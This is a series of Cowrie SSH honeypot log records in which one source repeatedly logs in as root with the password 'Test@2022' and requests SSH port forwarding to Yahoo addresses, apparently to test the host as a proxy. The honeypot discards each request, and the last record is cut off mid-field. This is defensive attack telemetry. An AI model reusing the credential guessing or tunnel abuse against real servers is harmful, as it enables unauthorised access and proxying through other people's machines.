{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:25.985191Z","src_ip":"213.209.150.239","session":"1fb8c7cde09f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":31211,"dst_ip":"1.2.3.4","dst_port":22,"session":"019e4ff291c6","protocol":"ssh","message":"New connection: 213.209.150.239:31211 (1.2.3.4:22) [session: 019e4ff291c6]","sensor":"my-vps","timestamp":"2025-08-26T01:04:26.031448Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:26.032323Z","src_ip":"213.209.150.239","session":"019e4ff291c6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:26.079932Z","src_ip":"213.209.150.239","session":"019e4ff291c6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:26.314591Z","src_ip":"213.209.150.239","session":"019e4ff291c6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":25106,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:25106","sensor":"my-vps","timestamp":"2025-08-26T01:04:26.362621Z","session":"019e4ff291c6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:26.409879Z","src_ip":"213.209.150.239","session":"019e4ff291c6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":16695,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:16695","sensor":"my-vps","timestamp":"2025-08-26T01:04:26.545563Z","session":"019e4ff291c6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:26.592676Z","src_ip":"213.209.150.239","session":"019e4ff291c6"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:26.641221Z","src_ip":"213.209.150.239","session":"019e4ff291c6"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":31249,"dst_ip":"1.2.3.4","dst_port":22,"session":"046e93edc4c9","protocol":"ssh","message":"New connection: 213.209.150.239:31249 (1.2.3.4:22) [session: 046e93edc4c9]","sensor":"my-vps","timestamp":"2025-08-26T01:04:26.687282Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:26.688408Z","src_ip":"213.209.150.239","session":"046e93edc4c9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:26.735484Z","src_ip":"213.209.150.239","session":"046e93edc4c9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:26.969847Z","src_ip":"213.209.150.239","session":"046e93edc4c9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":12779,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:12779","sensor":"my-vps","timestamp":"2025-08-26T01:04:27.017916Z","session":"046e93edc4c9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:27.065242Z","src_ip":"213.209.150.239","session":"046e93edc4c9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":28770,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:28770","sensor":"my-vps","timestamp":"2025-08-26T01:04:27.201519Z","session":"046e93edc4c9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:27.248662Z","src_ip":"213.209.150.239","session":"046e93edc4c9"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:27.296800Z","src_ip":"213.209.150.239","session":"046e93edc4c9"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":31301,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d398b7732c7","protocol":"ssh","message":"New connection: 213.209.150.239:31301 (1.2.3.4:22) [session: 5d398b7732c7]","sensor":"my-vps","timestamp":"2025-08-26T01:04:27.343204Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:27.343876Z","src_ip":"213.209.150.239","session":"5d398b7732c7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:27.391327Z","src_ip":"213.209.150.239","session":"5d398b7732c7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:27.626380Z","src_ip":"213.209.150.239","session":"5d398b7732c7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":31846,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:31846","sensor":"my-vps","timestamp":"2025-08-26T01:04:27.675001Z","session":"5d398b7732c7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:27.722258Z","src_ip":"213.209.150.239","session":"5d398b7732c7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":26033,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:26033","sensor":"my-vps","timestamp":"2025-08-26T01:04:27.857512Z","session":"5d398b7732c7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:27.904865Z","src_ip":"213.209.150.239","session":"5d398b7732c7"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:27.952773Z","src_ip":"213.209.150.239","session":"5d398b7732c7"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":31356,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d5c844d95de","protocol":"ssh","message":"New connection: 213.209.150.239:31356 (1.2.3.4:22) [session: 1d5c844d95de]","sensor":"my-vps","timestamp":"2025-08-26T01:04:28.008419Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:28.009350Z","src_ip":"213.209.150.239","session":"1d5c844d95de"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:28.065884Z","src_ip":"213.209.150.239","session":"1d5c844d95de"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:28.347907Z","src_ip":"213.209.150.239","session":"1d5c844d95de"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":30703,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:30703","sensor":"my-vps","timestamp":"2025-08-26T01:04:28.405428Z","session":"1d5c844d95de"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:28.462295Z","src_ip":"213.209.150.239","session":"1d5c844d95de"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":11262,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:11262","sensor":"my-vps","timestamp":"2025-08-26T01:04:28.618968Z","session":"1d5c844d95de"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:28.675556Z","src_ip":"213.209.150.239","session":"1d5c844d95de"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:28.732759Z","src_ip":"213.209.150.239","session":"1d5c844d95de"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":31413,"dst_ip":"1.2.3.4","dst_port":22,"session":"716bf1da88ec","protocol":"ssh","message":"New connection: 213.209.150.239:31413 (1.2.3.4:22) [session: 716bf1da88ec]","sensor":"my-vps","timestamp":"2025-08-26T01:04:28.778880Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:28.779978Z","src_ip":"213.209.150.239","session":"716bf1da88ec"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:28.827176Z","src_ip":"213.209.150.239","session":"716bf1da88ec"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:29.062167Z","src_ip":"213.209.150.239","session":"716bf1da88ec"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":12342,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:12342","sensor":"my-vps","timestamp":"2025-08-26T01:04:29.110395Z","session":"716bf1da88ec"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:29.157526Z","src_ip":"213.209.150.239","session":"716bf1da88ec"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":10154,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:10154","sensor":"my-vps","timestamp":"2025-08-26T01:04:29.293490Z","session":"716bf1da88ec"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:29.340738Z","src_ip":"213.209.150.239","session":"716bf1da88ec"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:29.389581Z","src_ip":"213.209.150.239","session":"716bf1da88ec"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":31453,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bc1bf0406d6","protocol":"ssh","message":"New connection: 213.209.150.239:31453 (1.2.3.4:22) [session: 5bc1bf0406d6]","sensor":"my-vps","timestamp":"2025-08-26T01:04:29.445421Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:29.446314Z","src_ip":"213.209.150.239","session":"5bc1bf0406d6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-25